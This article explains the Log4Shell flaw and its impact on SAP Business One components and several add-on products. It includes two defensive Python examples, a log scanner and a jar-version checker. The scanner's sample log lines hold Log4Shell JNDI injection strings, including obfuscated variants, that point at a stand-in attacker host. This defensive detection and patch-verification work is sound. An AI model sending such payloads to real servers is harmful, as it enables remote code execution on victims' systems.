The security vulnerability "Log4Shell" (CVE-2021-44228) was categorised as extremely critical (warning level red) by the German Federal Office for Information Security (BSI) on 10.12.2021. Software components used in connection with SAP Business One can also be affected by the Log4j vulnerability.
The vulnerability in Log4j
The name Log4Shell refers to the fact that the vulnerability sits in a widely used Java logging library called Log4j (Logging for Java). Attackers can exploit it to execute arbitrary code on the affected system.
In other words, without needing a login, a password or any other access barrier, attackers can hijack a server with a harmless-looking request: if a value that the application logs (a URL, a User-Agent header, a form field) contains a JNDI lookup expression of the form ${jndi:ldap://...}, Log4j resolves the lookup, contacts the attacker's server and loads the code it returns, which contains the malware.
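The attacker-controlled lookup described above has to pass through the victim's log first, which is where it can be caught. The following added example (not code from the article or from SAP) scans constructed web-server log lines for Log4Shell probes. It first undoes the nesting tricks attackers use to hide the word "jndi" from naive pattern matches (${lower:j}, ${::-j}, ${env:X:-j}, URL encoding), because Log4j resolves nested lookups innermost-first before it ever sees "jndi". The sample log lines, host names and helper names are all constructed for the example.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): one benign request, one plain
# JNDI probe in the URL, then three obfuscated variants hidden in the User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0100] "GET /B1i/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:10 +0100] "GET /${jndi:ldap://attacker.example/a} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:13:02:11 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0100] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:13 +0100] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/d}"',
]

# One lookup expression with no further nesting inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What the probe looks like once all the nesting is resolved.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+):", re.IGNORECASE)


def normalise_lookups(text: str) -> str:
    """Resolve the Log4j lookups attackers use to hide 'jndi', innermost first.

    Mirrors what Log4j itself does: ${name:-default} yields the default when the
    lookup of 'name' fails (so ${::-j} and ${env:NOPE:-j} both become 'j'), and
    ${lower:x}/${upper:x} change case. Anything else (jndi:, date:, ...) is left
    in place, so the loop always terminates.
    """
    text = unquote(text)  # %24%7Bjndi... style encoding

    def resolve(match: "re.Match[str]") -> str:
        inner = match.group(1)
        if ":-" in inner:
            return inner.split(":-", 1)[1]
        lowered = inner.lower()
        if lowered.startswith("lower:"):
            return inner[6:].lower()
        if lowered.startswith("upper:"):
            return inner[6:].upper()
        return match.group(0)

    while True:
        resolved = INNERMOST_LOOKUP.sub(resolve, text)
        if resolved == text:
            return resolved
        text = resolved


def find_log4shell_probes(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line index, JNDI scheme, normalised payload) for each probe found."""
    hits = []
    for index, line in enumerate(lines):
        normalised = normalise_lookups(line)
        match = JNDI_LOOKUP.search(normalised)
        if match:
            end = normalised.find("}", match.start()) + 1
            hits.append((index, match.group(1).lower(), normalised[match.start():end]))
    return hits


if __name__ == "__main__":
    for index, scheme, payload in find_log4shell_probes(SAMPLE_LOG_LINES):
        print(f"line {index}: {scheme} lookup -> {payload}")
```

Three of the four probes would slip past a plain search for the string "jndi"; only after normalisation do all four read as ${jndi:scheme://...}. In an investigation, the target host in the resolved payload is the indicator to pivot on (outbound LDAP/RMI/DNS connections from the logging host to that address).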
SAP Business One affected by Log4Shell
SAP has identified 32 applications affected by CVE-2021-44228. As of yesterday, Patch Tuesday, the software manufacturer has already patched 20 of these applications and is still working feverishly on further fixes. SAP Business One is also affected. SAP has already published a note (an S-User is required), which mainly refers to SAP Business One version 10.
The following components are affected:
- Workflow
- License Server
- Service Layer
- Job Service
- Extension Manager
- Integration Framework (B1i)
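Each of these components is a Java service that ships its own copy of the log4j-core library, so after patching (or after applying a temporary workaround) the state of every copy on the server should be verified rather than assumed. The following added example (not SAP's tooling and not code from this article) walks a directory tree, assesses every jar that bundles log4j-core classes and reports it as patched (version 2.15.0 or later, the first release that fixes CVE-2021-44228), mitigated (JndiLookup.class removed from the jar, the generic Apache-recommended workaround) or vulnerable. The directory layout, jar files and service names it builds are constructed stand-ins; on a real server you would point scan_tree at the SAP Business One server installation directory instead.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# The class Log4j 2.x uses to resolve ${jndi:...}; deleting it from the jar was
# the generic mitigation recommended while no patched release was available.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
FIXED_VERSION = (2, 15, 0)  # first release that fixes CVE-2021-44228


def _version_from(text: str) -> Optional[Tuple[int, int, int]]:
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in match.groups()) if match else None


def assess_jar(path: Path) -> Optional[Dict]:
    """Return a finding for a jar that bundles log4j-core, or None otherwise."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if not any(name.startswith(CORE_PREFIX) for name in names):
            return None  # log4j-api alone (or an unrelated jar) is not affected
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            match = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if match:
                version = _version_from(match.group(1))
        if version is None:  # shaded or renamed jar: fall back to the file name
            version = _version_from(path.name)
        has_jndi = JNDI_CLASS in names
    if version is not None and version >= FIXED_VERSION:
        verdict = "patched"
    elif not has_jndi:
        verdict = "mitigated"  # lookup class stripped, ${jndi:...} cannot resolve
    else:
        verdict = "vulnerable"
    return {"path": str(path), "version": version,
            "jndi_lookup_present": has_jndi, "verdict": verdict}


def scan_tree(root: Path) -> List[Dict]:
    """Assess every jar below root; nested jars inside jars are not unpacked."""
    findings = []
    for jar_path in sorted(root.rglob("*.jar")):
        finding = assess_jar(jar_path)
        if finding:
            findings.append(finding)
    return findings


def _write_stub_jar(path: Path, version: str, include_jndi: bool) -> None:
    """Constructed stand-in for log4j-core: real layout, stub class bytes."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        jar.writestr(CORE_PREFIX + "LoggerContext.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def build_sample_tree(root: Path) -> None:
    """Constructed layout: three services, each with its own log4j copy."""
    _write_stub_jar(root / "ServiceLayer/lib/log4j-core-2.14.1.jar", "2.14.1", True)
    _write_stub_jar(root / "JobService/lib/log4j-core-2.14.1.jar", "2.14.1", False)
    _write_stub_jar(root / "B1i/lib/log4j-core-2.17.1.jar", "2.17.1", True)
    with zipfile.ZipFile(root / "B1i/lib/log4j-api-2.17.1.jar", "w") as jar:
        jar.writestr("org/apache/logging/log4j/Logger.class", b"\xca\xfe\xba\xbe")


def demo() -> List[Dict]:
    root = Path(tempfile.mkdtemp(prefix="b1-log4j-"))
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['verdict']:<11}{finding['version']}  {finding['path']}")
```

The three verdicts correspond to the three states a component can be in after an incident like this: upgraded, temporarily mitigated by removing the lookup class, or untouched. A jar reported as mitigated is still worth replacing once the vendor patch is available, which is exactly what the FP2111 update at the end of this article does for SAP Business One.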
All-clear for MARIProject regarding Log4Shell
According to the manufacturer, Log4Shell is not a problem for MARIProject, one of the major extensions for SAP Business One. MARIProject largely dispenses with the use of Java and is therefore not affected by the Log4j vulnerability. This applies in particular to the web client and mobile client, the web service and the REST service.
Coresuite also not affected
The all-clear can also largely be given for Coresystems' products.
The following software products are not affected:
- Coresuite and its modules
- Coresuite Service
- Coresuite Cube
- SAP B1 Cloud Connector
The following products were found to be using Log4j. Appropriate patches or recommended temporary fixes have been applied:
- SAP Field Service Management
As FSM is a cloud-based solution, no action is required on the part of customers.
Log4Shell leaves CKS DIGITAL cold
C.K. Solutions categorically rules out any impact. Neither CKS.DMS, CKS.ADC, CKS.EINVOICE, CKS.WEB, CKS.SUISSQR nor CKS.RUN are affected in any way by "Log4Shell".
COBISOFT not affected by the Log4j zero-day vulnerability
The solutions from COBISOFT (COBI.time, COBI.wms, COBI.ppc, Cobi.edi, Cobi.msv) are also not affected by the Log4j vulnerability.
Boyum also not affected
The Boyum support portal now also states that none of the products in the Boyum family use Log4j software and that they are therefore not affected by the security vulnerability.
UPDATE
As of 11 January 2022, SAP has fixed the issue related to the Apache Log4j vulnerabilities in SAP Business One. In order to apply the fix, existing SAP Business One installations must be updated to version 10 FP2111.
With the published patch, SAP no longer recommends using the temporary workaround from SAP Note/KBA 3131789.